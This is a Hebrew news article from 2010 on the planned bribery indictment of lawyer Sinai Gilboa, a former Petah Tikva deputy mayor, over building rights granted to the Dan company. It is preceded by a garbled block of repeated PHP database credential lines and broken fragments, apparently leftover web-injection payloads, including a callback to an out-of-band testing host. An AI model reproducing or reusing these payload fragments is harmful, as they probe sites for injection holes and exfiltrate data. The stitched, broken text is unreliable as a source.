$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> הפרקליטות תגיש כתב אישום בכפוף לשימוע נגד סיני גלבוע בחשד לקבלת שוחד
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

יוגש כתב אישום נגד עורך דין סיני גלבוע

תאריך: 04/10/2010 16:02   מחבר: מערכת האתר

בחודש נובמבר 2001 אושרה תוכנית מתאר של העיר פתח תקווה. במסגרת התוכנית חויבת חברת "דן" לפנות את חניון עמנואל שבבעלותה. בתמורה לפינוי קבלה החברה זכויות להקמת 64 יחידות דיור בשטח. החברה התנגדה לתוכנית בטענה שזכויותיה קופחו, אולם הטענות נידחו על ידי שמאי התוכנית, ובהמלצת ראש העירייה, יצחק אוחיון, דחתה הוועדה המחוזית את התנגדותה של "דן" לתוכנית.

חברת "דן" לא השלימה עם ההחלטה. מנהלי החברה פנו לראש העיריה ולסגנו, עו"ד סיני גלבוע. למרות שלא הוגשו לשניים נתונים חדשים פנה ראש העיר אוחיון לוועדה המחוזית וביקש לקיים דיון נוסף בהתנגדות של חברת "דן".  עצם ההסכמה של ראש עיר וסגנו לפעול למען חברה מסחרית בתחום שיפוטם, עורר תהיות וחשדות באשר לכשרות  המניעים הנסתרים. תחקיר התוכנית "עובדה" חשף את הפרשה בתחילת שנת 2006 . מבקר המדינה צפה בשידור והחליט להיכנס לעובי הקורה.

מבקר המדינה בודק

בחודש יוני 2006 פירסם דוח מיוחד שאלו הם עיקרי ממצאיו:

בינואר 2003 חתם עו"ד גלבוע על שני הסכמים עם חברת "דן" שערכם הכולל נאמד ב-3.3 מיליון דולר. בהסכם הראשון התחייב גלבוע, באמצעות חברת הראל דביר נכסים, שבבעלות רעייתו ושנוהלה על ידו, להשביח את זכויותיה של חברת "דן" בתמורה לקבלת שכר טרחה שייגזר משווי הכולל של הזכויות. בהסכם השני מסרה לידיו "דן" את הטיפול בהסכמי המכר של יחידות הדיור שייבנו על פי התוכנית.

לאחר חתימת ההסכם הראשון בין גלבוע ל"דן" קיים ראש העירייה בביתו פגישה עם נציגי החברה שבה הסכים להגדיל את זכויותיה - ולאשר לה בניית 288 יחידות דיור במקום 64. 

ביולי 2003 המליצה הוועדה המקומית לוועדה המחוזית לאפשר ל"דן" להקים 350 יחידות דיור בשטח שיפונה, יותר ממה שאושר.  להמלצה לא צורפה חוות דעת של שמאי כלשהו.

במרס 2005 המליץ עו"ד גלבוע לחברת "דן" לבקש מהוועדה המקומית להגדיל ב-60 את מספר יחידות הדיור, לפי הזכות השמורה לוועדה להגדיל ב 20% את מספר היחידות המוקצות בתוכנית. כל הגדלה בזכויות הבנייה משרתת ישירות את גובה שכר טרחתו של גלבוע.

לעו"ד גלבוע היה ברור שהוא נמצא בניגוד עניינים חריף אל מול פעילותו לטובת חברת "דן". הוועדה לניגוד עניינים ביקשה ממנו הבהרות בשנת 2005. בתשובתו שנמסרה באיחור של 8 חודשים לא ציין את קשריו העסקיים עם חברת "דן".

המבקר קבע עוד בדוח כי " עו"ד גלבוע סייע לחברת דן להשביח את נכסיה, תוך ניצול קשריו עם ראש העירייה ושימוש לא ראוי במעמדו בעירייה, בקשריו עם עובדיה, בנגישותו למידע ובתפקידו בוועדה המקומית. בתמורה לשירותיו לחברה קיבל ממנה עד מועד סיום הביקורת סכום של 1,351,350 דולרים, יותר מ-6 מיליון שקלים - ועל פי החוזה הוא צפוי לקבל עוד כ-9 מיליון שקלים".

חקירה וכתב אישום

המבקר לא ראה מנוס מלהפנות את היועץ המשפטי לממשלה מהחשדות לקבלת שוחד המיוחס לעו"ד גלבוע. היועץ בחן את הממצאים והורה למשטרת ישראל לחקור בפרשה. החקירה הוטלה על יאח"ה.

החקירה הושלמה והועבר לעיון הפרקליטות. בראשית אוקטובר 2010 פורסם כי הפרקליטות הודיעה לעו"ד סיני גלבוע, פעיל בכיר בש"ס ולשעבר סגן ראש עיריית פתח-תקווה, כי לאחר בחינת חומר הראיות שנאסף בתיק החקירה  היא שוקלת - בכפוף לקיום שימוע - להגיש נגדו אישום על עבירות של לקיחת שוחד, מרמה והפרת אמונים והלבנת הון.

בנוסף,  הפרקליטות שוקלת להאשים את חברת הראל דביר באותה פרשה על עבירות של הלבנת הון ואת דוד חרמש וחברת דן בעבירה של מתן שוחד.